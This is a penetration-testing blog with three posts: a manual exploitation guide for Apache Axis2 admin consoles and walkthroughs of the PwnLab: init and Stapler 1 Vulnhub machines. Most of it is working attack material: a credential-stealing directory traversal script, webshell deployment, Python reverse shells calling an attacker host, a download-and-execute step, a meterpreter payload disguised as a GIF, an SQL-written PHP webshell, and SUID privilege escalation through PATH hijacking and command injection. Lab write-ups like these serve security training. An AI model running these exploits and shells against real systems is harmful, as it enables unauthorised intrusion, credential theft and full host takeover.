Thursday, March 9, 2017

Manually Exploiting Apache Axis2

Disclaimer:

I do not condone or take responsibility for any illegal use of this tutorial. Please only target hosts you have permission to test.

Prerequisites

For this exploit to work you must have:
  1. Valid admin console credentials
    • Default = admin:axis2
  2. Public access to the admin console
    • https://victim.com/axis2/axis2-admin

Discovery

There are a few ways to obtain credentials for an Axis2 server: default credentials, weak credentials that can be brute forced, or a vulnerability in an outdated Axis2 build. Here we use a directory traversal in Apache Axis2 <= v1.4.1: the xsd parameter of a deployed service can be pointed at ../conf/axis2.xml, which stores the admin console username and password in cleartext. Both Nmap and OpenVAS ship checks for it.

Nmap


$ nmap -p<port> --script http-axis2-dir-traversal <ip>
|_http-axis2-dir-traversal.nse: Admin credentials found -> admin:axis2

OpenVAS

FYI

  • There is a Metasploit module, "exploit/multi/http/axis2_deployer", that automates the same attack: it authenticates to the admin console and deploys a malicious service.
  • The module source is in the metasploit-framework repository on GitHub.
  • I have tried this exploit multiple times with no success.

Manual Validation

  1. Navigating to https://victim.com/axis2/services/Version?xsd=../conf/axis2.xml returns the server's axis2.xml, which contains the admin console credentials. (Version is the sample service deployed by default; if it has been removed, list the deployed services at /axis2/services/listServices and use another.) The credentials should look like this:
     <parameter name="userName">admin</parameter>
     <parameter name="password">axis2</parameter>
  2. Navigating to https://victim.com/axis2/axis2-admin/ should give you the login portal. Log in with the recovered credentials to confirm they are valid before building a payload.
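The credential recovery described above, as an added example that is not part of the original post: a small Python script that builds the traversal URL, checks that the response really is an axis2.xml rather than an error page, and parses the userName and password parameters out of it. The target host is a placeholder and the embedded axis2.xml is a constructed excerpt, so the parsing runs offline; the network fetch is only used when a base URL is given on the command line.

```python
"""
Added example (not part of the original post): recover the Axis2 admin
console credentials from axis2.xml obtained through the xsd traversal.
"""
import re
import ssl
import sys
import urllib.request
import xml.etree.ElementTree as ET

# Traversal path from the post; the base URL (e.g. https://victim.com) is supplied by the caller.
TRAVERSAL_PATH = "/axis2/services/Version?xsd=../conf/axis2.xml"

# Constructed excerpt of an axis2.xml; real files are much longer.
SAMPLE_AXIS2_XML = """<?xml version="1.0" encoding="UTF-8"?>
<axisconfig name="AxisJava2.0">
    <parameter name="hotdeployment">true</parameter>
    <parameter name="hotupdate">false</parameter>
    <parameter name="userName">admin</parameter>
    <parameter name="password">axis2</parameter>
    <parameter name="contextRoot">axis2</parameter>
</axisconfig>
"""


def traversal_url(base_url: str) -> str:
    """Build the traversal URL for a base such as https://victim.com."""
    return base_url.rstrip("/") + TRAVERSAL_PATH


def looks_like_axis2_config(text: str) -> bool:
    """Confirm the traversal returned axis2.xml and not a 404 or login page."""
    return "<axisconfig" in text


def extract_admin_credentials(xml_text: str):
    """Return (userName, password) from axis2.xml, or None if absent.

    The admin console credentials are top-level <parameter> elements named
    userName and password, stored in cleartext.
    """
    try:
        root = ET.fromstring(xml_text)
    except ET.ParseError:
        # Fall back to a regex when the file is truncated or wrapped in extra markup.
        m_user = re.search(r'<parameter name="userName">([^<]*)</parameter>', xml_text)
        m_pass = re.search(r'<parameter name="password">([^<]*)</parameter>', xml_text)
        return (m_user.group(1), m_pass.group(1)) if (m_user and m_pass) else None
    params = {p.get("name"): (p.text or "") for p in root.iter("parameter")}
    if "userName" in params and "password" in params:
        return params["userName"], params["password"]
    return None


def is_default_credential(creds) -> bool:
    """Flag the well-known Axis2 default pair."""
    return creds == ("admin", "axis2")


def fetch_config(base_url: str, timeout: float = 10.0) -> str:
    """Request axis2.xml over the traversal (network; not exercised offline).

    Certificate verification is disabled because lab targets usually have
    self-signed certificates; do not carry that into production tooling.
    """
    ctx = ssl._create_unverified_context()
    req = urllib.request.Request(traversal_url(base_url), headers={"User-Agent": "axis2-check"})
    with urllib.request.urlopen(req, timeout=timeout, context=ctx) as resp:
        return resp.read().decode("utf-8", errors="replace")


if __name__ == "__main__":
    text = fetch_config(sys.argv[1]) if len(sys.argv) > 1 else SAMPLE_AXIS2_XML
    if not looks_like_axis2_config(text):
        sys.exit("response does not look like axis2.xml; the service name may be wrong")
    creds = extract_admin_credentials(text)
    print("admin credentials:", creds, "(default)" if is_default_credential(creds) else "")
```

Run it with no arguments to see the parsing on the embedded sample, or with a base URL to fetch from a host you are authorised to test. The regex fallback matters in practice: some servers wrap the traversed file in a SOAP fault or cut it short, and a strict XML parse would then lose credentials that are plainly visible in the response.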

Create the Payload

A simple Axis2 webshell can be found at https://github.com/CaledoniaProject/AxisInvoker
  1. Download the file
  2. Compile the file
    • Modify $JAVA_HOME if necessary
    • "ant -v" to build

Exploit

  1. Log in to the admin console and upload the AxisInvoker.aar service through the "Upload Service" page.
  2. Verify the deployment by checking that AxisInvoker is listed under the Deactivate or Activate service tab.
  3. Verify the shell works by requesting https://victim.com/axis2/services/AxisInvoker/exec?cmd=id (commands run as the user the servlet container runs as).
  4. Since a stable shell is superior to a web shell, upgrade to a reverse shell. First find out which interpreters are on the system (python, perl, php) or fall back to a native option such as nc.
    • Pick a reverse shell and edit it to point at your attacker host and listening port.
      • I usually get most of my shells from PentestMonkey
      • import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect(("<AttackerIP>",443));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2); p=subprocess.call(["/bin/sh","-i"]);
    • Start a listener on the attacker machine: "nc -nlvp 443".
    • Use the AxisInvoker download endpoint to fetch the reverse shell from your web server onto the victim:
      • https://victim.com/axis2/services/AxisInvoker/download?url=http://<AttackerIP>/shell.py&file=shell.py
    • Execute it on the victim. The file name must match what you downloaded, and spaces in cmd must be URL-encoded:
      • https://victim.com/axis2/services/AxisInvoker/exec?cmd=python%20shell.py
    • After a few seconds, you should have a shell on your listener.

Hope that helps in your future pentests!

Wednesday, August 31, 2016

PwnLab: init Vulnhub Walkthrough

Information Gathering

First, I run a TCP Scan to enumerate the host.
$nmap -vv -n -Pn -p- -sV -A 192.168.56.103

PORT      STATE SERVICE REASON         VERSION
80/tcp    open  http    syn-ack ttl 64 Apache httpd 2.4.10 ((Debian))
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: PwnLab Intranet Image Hosting
111/tcp   open  rpcbind syn-ack ttl 64 2-4 (RPC #100000)
| rpcinfo: 
|   program version   port/proto  service
|   100000  2,3,4        111/tcp  rpcbind
|   100000  2,3,4        111/udp  rpcbind
|   100024  1          37203/udp  status
|_  100024  1          50129/tcp  status
3306/tcp  open  mysql   syn-ack ttl 64 MySQL 5.5.47-0+deb8u1
| mysql-info: 
|   Protocol: 53
|   Version: .5.47-0+deb8u1
|   Thread ID: 39
|   Capabilities flags: 63487
|   Some Capabilities: LongPassword, Support41Auth, SupportsCompression, Speaks41ProtocolNew, SupportsLoadDataLocal, FoundRows, SupportsTransactions, ConnectWithDatabase, IgnoreSigpipes, LongColumnFlag, InteractiveClient, Speaks41ProtocolOld, ODBCClient, IgnoreSpaceBeforeParenthesis, DontAllowDatabaseTableColumn
|   Status: Autocommit
|_  Salt: :LQ3IVT$U^Y&O>%?LCI$
50129/tcp open  status  syn-ack ttl 64 1 (RPC #100024)
MAC Address: 08:00:27:94:0C:7C (Oracle VirtualBox virtual NIC)

Local Privilege

With the help of an article (https://diablohorn.com/2010/01/16/interesting-local-file-inclusion-method/), I found a PHP local file inclusion in the page parameter. Because the value is passed to include(), the php://filter wrapper can return a script's source base64-encoded instead of executing it. I curl the page and base64 decode the result:
curl http://192.168.56.103/?page=php://filter/convert.base64-encode/resource=config

config.php
<?php
$server   = "localhost";
$username = "root";
$password = "H4u%QJ_H99";
$database = "Users";
?>
I also pulled down the source of the upload page the same way, to see what filtering I would need to bypass to upload a shell.
upload.php

<html>
    <body>
        <form action='' method='post' enctype='multipart/form-data'>
            <input type='file' name='file' id='file' />
            <input type='submit' name='submit' value='Upload'/>
        </form>
    </body>
</html>
<?php 
if(isset($_POST['submit'])) {
    if ($_FILES['file']['error'] <= 0) {
        $filename  = $_FILES['file']['name'];
        $filetype  = $_FILES['file']['type'];
        $uploaddir = 'upload/';
        $file_ext  = strrchr($filename, '.');
        $imageinfo = getimagesize($_FILES['file']['tmp_name']);
        $whitelist = array(".jpg",".jpeg",".gif",".png"); 

        if (!(in_array($file_ext, $whitelist))) {
            die('Not allowed extension, please upload images only.');
        }

        if(strpos($filetype,'image') === false) {
            die('Error 001');
        }

        if($imageinfo['mime'] != 'image/gif' && $imageinfo['mime'] != 'image/jpeg' && $imageinfo['mime'] != 'image/jpg'&& $imageinfo['mime'] != 'image/png') {
            die('Error 002');
        }

        if(substr_count($filetype, '/')>1){
            die('Error 003');
        }

        $uploadfile = $uploaddir . md5(basename($_FILES['file']['name'])).$file_ext;

        if (move_uploaded_file($_FILES['file']['tmp_name'], $uploadfile)) {
            echo "<img src=\"".$uploadfile."\"><br />";
        } else {
            die('Error 4');
        }
    }
}

?>
From upload.php I learn that only logged-in users are authorized to upload, so I need a valid account. I log in to MySQL with the credentials from config.php and dump the users table. The passwords are base64 encoded, so I decode them as well (the third column below is my decoding, not a database column).
root@kali:~/Desktop# mysql -u root -p -h 192.168.56.103
Enter password: 
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 1558
Server version: 5.5.47-0+deb8u1 (Debian)

Copyright (c) 2000, 2016, Oracle and/or its affiliates. All rights reserved.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| Users              |
+--------------------+
2 rows in set (0.00 sec)

mysql> use Users;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
mysql> show tables;
+-----------------+
| Tables_in_Users |
+-----------------+
| users           |
+-----------------+
1 row in set (0.00 sec)

mysql> Select * from users;
+------+------------------+---------------+
| user | pass             | Base64 Decode |
+------+------------------+---------------+
| kent | Sld6WHVCSkpOeQ== | JWzXuBJJNy    |
| mike | U0lmZHNURW42SQ== | SIfdsTEn6I    |
| kane | aVN2NVltMkdSbw== | iSv5Ym2GRo    |
+------+------------------+---------------+
3 rows in set (0.00 sec)
Knowing that only files recognised as images can be uploaded, I prepend a GIF header to a PHP meterpreter generated with msfvenom. getimagesize() identifies a GIF by its first three bytes, "GIF", so the header alone satisfies the MIME check while the file remains PHP when it is included.
root@kali:~/Desktop# echo GIF98 > shell.gif
root@kali:~/Desktop# msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.56.101 LPORT=443 >> shell.gif
No platform was selected, choosing Msf::Module::Platform::PHP from the payload
No Arch selected, selecting Arch: php from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 26801 bytes
I also found an LFI in index.php that will execute that shell: the lang cookie is concatenated into an include() path without any sanitisation.
index.php
<?php
//Multilingual. Not implemented yet.
//setcookie("lang","en.lang.php");
if (isset($_COOKIE['lang']))
{
    include("lang/".$_COOKIE['lang']);
}
// Not implemented yet.
?>
...
I then upload shell.gif through the uploader and get the stored name of the file by browsing to the directory (http://192.168.56.103/upload/); upload.php names it md5(original filename) plus the original extension. Then I request index.php with the lang cookie tampered through a proxy to ../upload/<name>.gif, which makes include() execute the PHP inside my gif.

Privilege Escalation

This creates a meterpreter session and I use python to gain a TTY.
meterpreter > shell
Process 1435 created.
Channel 0 created.
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
python -c 'import pty;pty.spawn("/bin/bash")'
I switch users to kane with su, reusing the password from the database. Once I am kane, I notice a SUID binary in kane's home folder owned by mike. I run strings on the executable to see what it does.
kane@pwnlab:~$ ls -lah
ls -lah
total 28K
drwxr-x--- 2 kane kane 4.0K Mar 17 13:04 .
drwxr-xr-x 6 root root 4.0K Mar 17 10:09 ..
-rw-r--r-- 1 kane kane  220 Mar 17 10:09 .bash_logout
-rw-r--r-- 1 kane kane 3.5K Mar 17 10:09 .bashrc
-rwsr-sr-x 1 mike mike 5.1K Mar 17 13:04 msgmike
-rw-r--r-- 1 kane kane  675 Mar 17 10:09 .profile
kane@pwnlab:~$ strings msgmike
...
cat /home/mike/msg.txt
...
kane@pwnlab:~$ ./msgmike
./msgmike
cat: /home/mike/msg.txt: No such file or directory
The binary calls cat without an absolute path, so by putting the current directory first in PATH I can supply my own cat that runs a shell as mike.
kane@pwnlab:~$ echo "/bin/sh" > cat       
echo "/bin/sh" > cat
kane@pwnlab:~$ chmod 777 cat
chmod 777 cat
kane@pwnlab:~$ export PATH=.:$PATH
export PATH=.:$PATH
kane@pwnlab:~$ echo $PATH
echo $PATH
.:/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games
kane@pwnlab:~$ ./msgmike
./msgmike
$ id
id
uid=1002(mike) gid=1002(mike) groups=1002(mike),1003(kane)
Now that I am mike, I move to mike's home directory, where I find another SUID binary, this time owned by root. Running strings shows it builds a shell command by substituting my message into "/bin/echo %s >> /root/messages.txt", so a semicolon in the message terminates the echo and whatever follows runs as root.
$ cd /home/mike
$ ls -lah
total 28K
drwxr-x--- 2 mike mike 4.0K Mar 17 15:19 .
drwxr-xr-x 6 root root 4.0K Mar 17 10:09 ..
-rw-r--r-- 1 mike mike  220 Mar 17 10:08 .bash_logout
-rw-r--r-- 1 mike mike 3.5K Mar 17 10:08 .bashrc
-rwsr-sr-x 1 root root 5.3K Mar 17 13:07 msg2root
-rw-r--r-- 1 mike mike  675 Mar 17 10:08 .profile
$ strings msg2root
...
Message for root: 
/bin/echo %s >> /root/messages.txt
...
I append ;/bin/sh to the message to escalate to root (note the euid of 0 below). Then I can find and print the flag.
$ ./msg2root
./msg2root
Message for root: test;/bin/sh
test;/bin/sh
test
# id
id
uid=1002(mike) gid=1002(mike) euid=0(root) egid=0(root) groups=0(root),1003(kane)
# ls -lah /root
ls -lah /root
total 20K
drwx------  2 root root 4.0K Mar 17 15:17 .
drwxr-xr-x 21 root root 4.0K Mar 17 09:13 ..
lrwxrwxrwx  1 root root    9 Mar 17 10:06 .bash_history -> /dev/null
-rw-r--r--  1 root root  570 Jan 31  2010 .bashrc
----------  1 root root 1.8K Mar 17 15:17 flag.txt
lrwxrwxrwx  1 root root    9 Mar 17 13:10 messages.txt -> /dev/null
lrwxrwxrwx  1 root root    9 Mar 17 13:10 .mysql_history -> /dev/null
-rw-r--r--  1 root root  140 Nov 19  2007 .profile
# cat /root/flag.txt
cat /root/flag.txt
.-=~=-.                                                                 .-=~=-.
(__  _)-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-(__  _)
(_ ___)  _____                             _                            (_ ___)
(__  _) /  __ \                           | |                           (__  _)
( _ __) | /  \/ ___  _ __   __ _ _ __ __ _| |_ ___                      ( _ __)
(__  _) | |    / _ \| '_ \ / _` | '__/ _` | __/ __|                     (__  _)
(_ ___) | \__/\ (_) | | | | (_| | | | (_| | |_\__ \                     (_ ___)
(__  _)  \____/\___/|_| |_|\__, |_|  \__,_|\__|___/                     (__  _)
( _ __)                     __/ |                                       ( _ __)
(__  _)                    |___/                                        (__  _)
(__  _)                                                                 (__  _)
(_ ___) If  you are  reading this,  means  that you have  break 'init'  (_ ___)
( _ __) Pwnlab.  I hope  you enjoyed  and thanks  for  your time doing  ( _ __)
(__  _) this challenge.                                                 (__  _)
(_ ___)                                                                 (_ ___)
( _ __) Please send me  your  feedback or your  writeup,  I will  love  ( _ __)
(__  _) reading it                                                      (__  _)
(__  _)                                                                 (__  _)
(__  _)                                             For sniferl4bs.com  (__  _)
( _ __)                                claor@PwnLab.net - @Chronicoder  ( _ __)
(__  _)                                                                 (__  _)
(_ ___)-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-(_ ___)
`-._.-'                                                                 `-._.-'
# 
Special thanks to Claor for making this VM. That early PHP LFI was really interesting!

Monday, August 29, 2016

Stapler 1: Vulnhub Walkthrough

Information Gathering

I started by doing an Nmap TCP and UDP scan to enumerate the services.
PORT    STATE         SERVICE     REASON              VERSION
53/udp  open          domain      udp-response ttl 64 dnsmasq 2.75
| dns-nsid: 
|_  bind.version: dnsmasq-2.75
68/udp  open|filtered dhcpc       no-response
69/udp  open|filtered tftp        no-response
137/udp open          netbios-ns  udp-response ttl 64 Samba nmbd netbios-ns (workgroup: WORKGROUP)
138/udp open|filtered netbios-dgm no-response
MAC Address: 08:00:27:BB:06:52 (Oracle VirtualBox virtual NIC)

nmap -vv -n -Pn -p- -sV -A 192.168.56.102
Starting Nmap 7.25BETA1 ( https://nmap.org ) at 2016-08-29 12:53 MDT
NSE: Loaded 138 scripts for scanning.
Host is up, received arp-response (0.00033s latency).
Scanned at 2016-08-29 12:53:12 MDT for 157s
Not shown: 65523 filtered ports
Reason: 65523 no-responses
PORT      STATE  SERVICE     REASON         VERSION
20/tcp    closed ftp-data    reset ttl 64
21/tcp    open   ftp         syn-ack ttl 64 vsftpd 2.0.8 or later
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: Can't parse PASV response: "Permission denied."
22/tcp    open   ssh         syn-ack ttl 64 OpenSSH 7.2p2 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 81:21:ce:a1:1a:05:b1:69:4f:4d:ed:80:28:e8:99:05 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDc/xrBbi5hixT2B19dQilbbrCaRllRyNhtJcOzE8x0BM1ow9I80RcU7DtajyqiXXEwHRavQdO+/cHZMyOiMFZG59OCuIouLRNoVO58C91gzDgDZ1fKH6BDg+FaSz+iYZbHg2lzaMPbRje6oqNamPR4QGISNUpxZeAsQTLIiPcRlb5agwurovTd3p0SXe0GknFhZwHHvAZWa2J6lHE2b9K5IsSsDzX2WHQ4vPb+1DzDHV0RTRVUGviFvUX1X5tVFvVZy0TTFc0minD75CYClxLrgc+wFLPcAmE2C030ER/Z+9umbhuhCnLkLN87hlzDSRDPwUjWr+sNA3+7vc/xuZul
|   256 5b:a5:bb:67:91:1a:51:c2:d3:21:da:c0:ca:f0:db:9e (ECDSA)
|_ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBNQB5n5kAZPIyHb9lVx1aU0fyOXMPUblpmB8DRjnP8tVIafLIWh54wmTFVd3nCMr1n5IRWiFeX1weTBDSjjz0IY=
53/tcp    open   domain      syn-ack ttl 64 dnsmasq 2.75
| dns-nsid: 
|_  bind.version: dnsmasq-2.75
80/tcp    open   http        syn-ack ttl 64
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: 404 Not Found
123/tcp   closed ntp         reset ttl 64
137/tcp   closed netbios-ns  reset ttl 64
138/tcp   closed netbios-dgm reset ttl 64
139/tcp   open   netbios-ssn syn-ack ttl 64 Samba smbd 4.3.9-Ubuntu (workgroup: WORKGROUP)
666/tcp   open   doom?       syn-ack ttl 64
3306/tcp  open   mysql       syn-ack ttl 64 MySQL 5.7.12-0ubuntu1
| mysql-info: 
|   Protocol: 53
|   Version: .7.12-0ubuntu1
|   Thread ID: 8
|   Capabilities flags: 63487
|   Some Capabilities: FoundRows, Support41Auth, SupportsCompression, Speaks41ProtocolOld, IgnoreSpaceBeforeParenthesis, LongColumnFlag, DontAllowDatabaseTableColumn, SupportsTransactions, ODBCClient, IgnoreSigpipes, Speaks41ProtocolNew, InteractiveClient, LongPassword, SupportsLoadDataLocal, ConnectWithDatabase
|   Status: Autocommit
|_  Salt: I)\x19f\x1CHS\j+2c\x1DnmS+y?c
12380/tcp open   http        syn-ack ttl 64 Apache httpd 2.4.18 ((Ubuntu))
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Tim, we need to-do better next year for Initech

Local Privilege

Local Privilege 1: HTTPS 12380

Since the site root on port 12380 returns a 404, I check robots.txt.
https://192.168.56.102:12380/robots.txt
        User-agent: *
        Disallow: /admin112233/
        Disallow: /blogblog/

admin112233 is unfinished, but blogblog is a WordPress application. I then run wpscan against it to enumerate users and plugins.
wpscan -u https://192.168.56.102:12380/blogblog/ --enumerate u

    [+] Enumerating usernames ...
    [+] Identified the following 10 user/s:
        +----+---------+-----------------+
        | Id | Login   | Name            |
        +----+---------+-----------------+
        | 1  | john    | John Smith      |
        | 2  | elly    | Elly Jones      |
        | 3  | peter   | Peter Parker    |
        | 4  | barry   | Barry Atkins    |
        | 5  | heather | Heather Neville |
        | 6  | garry   | garry           |
        | 7  | harry   | harry           |
        | 8  | scott   | scott           |
        | 9  | kathy   | kathy           |
        | 10 | tim     | tim             |
        +----+---------+-----------------+

wpscan -u https://192.168.56.102:12380/blogblog/ --enumerate ap

    [+] Name: advanced-video-embed-embed-videos-or-playlists - v1.0
     |  Latest version: 1.0 (up to date)
     |  Location: https://192.168.56.102:12380/blogblog/wp-content/plugins/advanced-video-embed-embed-videos-or-playlists/
     |  Readme: https://192.168.56.102:12380/blogblog/wp-content/plugins/advanced-video-embed-embed-videos-or-playlists/readme.txt
    [!] Directory listing is enabled: https://192.168.56.102:12380/blogblog/wp-content/plugins/advanced-video-embed-embed-videos-or-playlists/

I find that advanced-video-embed-embed-videos-or-playlists v1.0 has a local file inclusion vulnerability listed on Exploit-DB: https://www.exploit-db.com/exploits/39646/. I download the exploit and modify it for SSL (the script targets plain http and the site uses a self-signed certificate) with the following code.
    import ssl

    ssl._create_default_https_context = ssl._create_unverified_context
    url = "https://192.168.56.102:12380/blogblog"

With this vulnerability I pulled both wp-config.php and /etc/passwd. After running the exploit, I browsed to https://192.168.56.102:12380/blogblog/wp-content/uploads/ to find the random name assigned to my file. Opening it in the browser fails because the browser tries to render a configuration file as a jpeg; I pulled the text down with curl instead.
../wp-config.php
        define('DB_NAME', 'wordpress');

        /** MySQL database username */
        define('DB_USER', 'root');

        /** MySQL database password */
        define('DB_PASSWORD', 'plbkac');

        /** MySQL hostname */
        define('DB_HOST', 'localhost');

../../../../etc/passwd

    root:x:0:0:root:/root:/bin/zsh
    ...
    www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
    ...
    peter:x:1000:1000:Peter,,,:/home/peter:/bin/zsh
    mysql:x:111:117:MySQL Server,,,:/nonexistent:/bin/false
    RNunemaker:x:1001:1001::/home/RNunemaker:/bin/bash
    ETollefson:x:1002:1002::/home/ETollefson:/bin/bash
    DSwanger:x:1003:1003::/home/DSwanger:/bin/bash
    AParnell:x:1004:1004::/home/AParnell:/bin/bash
    SHayslett:x:1005:1005::/home/SHayslett:/bin/bash
    MBassin:x:1006:1006::/home/MBassin:/bin/bash
    JBare:x:1007:1007::/home/JBare:/bin/bash
    LSolum:x:1008:1008::/home/LSolum:/bin/bash
    IChadwick:x:1009:1009::/home/IChadwick:/bin/false
    MFrei:x:1010:1010::/home/MFrei:/bin/bash
    SStroud:x:1011:1011::/home/SStroud:/bin/bash
    CCeaser:x:1012:1012::/home/CCeaser:/bin/dash
    JKanode:x:1013:1013::/home/JKanode:/bin/bash
    CJoo:x:1014:1014::/home/CJoo:/bin/bash
    Eeth:x:1015:1015::/home/Eeth:/usr/sbin/nologin
    LSolum2:x:1016:1016::/home/LSolum2:/usr/sbin/nologin
    JLipps:x:1017:1017::/home/JLipps:/bin/sh
    jamie:x:1018:1018::/home/jamie:/bin/sh
    Sam:x:1019:1019::/home/Sam:/bin/zsh
    Drew:x:1020:1020::/home/Drew:/bin/bash
    jess:x:1021:1021::/home/jess:/bin/bash
    SHAY:x:1022:1022::/home/SHAY:/bin/bash
    Taylor:x:1023:1023::/home/Taylor:/bin/sh
    mel:x:1024:1024::/home/mel:/bin/bash
    kai:x:1025:1025::/home/kai:/bin/sh
    zoe:x:1026:1026::/home/zoe:/bin/bash
    NATHAN:x:1027:1027::/home/NATHAN:/bin/bash
    www:x:1028:1028::/home/www:
    postfix:x:112:118::/var/spool/postfix:/bin/false
    ftp:x:110:116:ftp daemon,,,:/var/ftp:/bin/false
    elly:x:1029:1029::/home/elly:/bin/bash

With the database root password, you can get a shell through either phpMyAdmin or remote MySQL access. I chose remote MySQL. Writing a file with SELECT ... INTO OUTFILE needs the FILE privilege (root has it) and a secure_file_priv setting that does not block the uploads directory.
$ mysql -u root -p -h 192.168.56.102
mysql> show databases;
mysql> use wordpress;
mysql> show tables;
mysql> Select user_login, user_pass from wp_users;
    +------------+------------------------------------+
    | user_login | user_pass                          |
    +------------+------------------------------------+
    | John       | $P$B7889EMq/erHIuZapMB8GEizebcIy9. |
    | Elly       | $P$BlumbJRRBit7y50Y17.UPJ/xEgv4my0 |
    | Peter      | $P$BTzoYuAFiBA5ixX2njL0XcLzu67sGD0 |
    | barry      | $P$BIp1ND3G70AnRAkRY41vpVypsTfZhk0 |
    | heather    | $P$Bwd0VpK8hX4aN.rZ14WDdhEIGeJgf10 |
    | garry      | $P$BzjfKAHd6N4cHKiugLX.4aLes8PxnZ1 |
    | harry      | $P$BqV.SQ6OtKhVV7k7h1wqESkMh41buR0 |
    | scott      | $P$BFmSPiDX1fChKRsytp1yp8Jo7RdHeI1 |
    | kathy      | $P$BZlxAMnC6ON.PYaurLGrhfBi6TjtcA0 |
    | tim        | $P$BXDR7dLIJczwfuExJdpQqRsNf.9ueN0 |
    | ZOE        | $P$B.gMMKRP11QOdT5m1s9mstAUEDjagu1 |
    | Dave       | $P$Bl7/V9Lqvu37jJT.6t4KWmY.v907Hy. |
    | Simon      | $P$BLxdiNNRP008kOQ.jE44CjSK/7tEcz0 |
    | Abby       | $P$ByZg5mTBpKiLZ5KxhhRe/uqR.48ofs. |
    | Vicki      | $P$B85lqQ1Wwl2SqcPOuKDvxaSwodTY131 |
    | Pam        | $P$BuLagypsIJdEuzMkf20XyS5bRm00dQ0 |
    +------------+------------------------------------+
mysql> Select "<?php echo shell_exec($_GET['cmd']);?>" into outfile "/var/www/https/blogblog/wp-content/uploads/shell.php";
Query OK, 1 row affected (0.00 sec)

I was then able to access the shell via curl
curl -k https://192.168.56.102:12380/blogblog/wp-content/uploads/shell.php?cmd=ifconfig
enp0s3    Link encap:Ethernet  HWaddr 08:00:27:bb:06:52  
          inet addr:192.168.56.102  Bcast:192.168.56.255  Mask:255.255.255.0
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:343006 errors:0 dropped:0 overruns:0 frame:0
          TX packets:154479 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:46270812 (46.2 MB)  TX bytes:56110368 (56.1 MB)
          Interrupt:10 Base address:0xd000 

lo        Link encap:Local Loopback  
          inet addr:127.0.0.1  Mask:255.0.0.0
          UP LOOPBACK RUNNING  MTU:65536  Metric:1
          RX packets:180 errors:0 dropped:0 overruns:0 frame:0
          TX packets:180 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1 
          RX bytes:24245 (24.2 KB)  TX bytes:24245 (24.2 KB)

Since web shells are fragile, I upgraded to a reverse shell with python and then used python again to obtain a TTY.
https://192.168.56.102:12380/blogblog/wp-content/uploads/shell.php?cmd=python%20-c%20'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.56.101",443));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

python -c 'import pty;pty.spawn("/bin/bash")'

There are other things you can enumerate from the database, such as:

  • MySQL passwords (I already have root)
  • The loot database (which has interesting info but no passwords)
  • Proof (which contains a memo to the DBA)

I formatted the WordPress hashes and used John to crack them to the best of my ability.
    john stapler.wpusers

        Elly:ylle
        garry:football
        harry:monkey
        scott:cookie
        tim:thumb
        Simon:TOM

    6 password hashes cracked, 10 left

Local Privilege 2: Bruteforce

I was able to enumerate users for a bruteforce three ways: service banners, SMB, and FTP.

Banner User Enumeration

This method is self-explanatory: the service banners name users I can bruteforce.
    FTP: Harry, Elly, John
    SSH: Barry
    SMB: Kathy, Fred
    HTTPS: Tim
    

SMB User Enumeration

By running enum4linux against the talkative SMB service, I can enumerate local users for a bruteforce.
    enum4linux 192.168.56.102
    S-1-22-1-1000 Unix User\peter (Local User)
    S-1-22-1-1001 Unix User\RNunemaker (Local User)
    S-1-22-1-1002 Unix User\ETollefson (Local User)
    S-1-22-1-1003 Unix User\DSwanger (Local User)
    S-1-22-1-1004 Unix User\AParnell (Local User)
    S-1-22-1-1006 Unix User\MBassin (Local User)
    S-1-22-1-1007 Unix User\JBare (Local User)
    S-1-22-1-1008 Unix User\LSolum (Local User)
    S-1-22-1-1009 Unix User\IChadwick (Local User)
    S-1-22-1-1010 Unix User\MFrei (Local User)
    S-1-22-1-1011 Unix User\SStroud (Local User)
    S-1-22-1-1012 Unix User\CCeaser (Local User)
    S-1-22-1-1013 Unix User\JKanode (Local User)
    S-1-22-1-1014 Unix User\CJoo (Local User)
    S-1-22-1-1015 Unix User\Eeth (Local User)
    S-1-22-1-1016 Unix User\LSolum2 (Local User)
    S-1-22-1-1017 Unix User\JLipps (Local User)
    S-1-22-1-1018 Unix User\jamie (Local User)
    S-1-22-1-1020 Unix User\Drew (Local User)
    S-1-22-1-1021 Unix User\jess (Local User)
    S-1-22-1-1023 Unix User\Taylor (Local User)
    S-1-22-1-1025 Unix User\kai (Local User)
    S-1-22-1-1026 Unix User\zoe (Local User)
    S-1-22-1-1027 Unix User\NATHAN (Local User)
    S-1-22-1-1028 Unix User\www (Local User)
    S-1-22-1-1029 Unix User\elly (Local User)
    

FTP User Enumeration

Using an anonymous login, I can enumerate some users from the banner and the note left on the server.
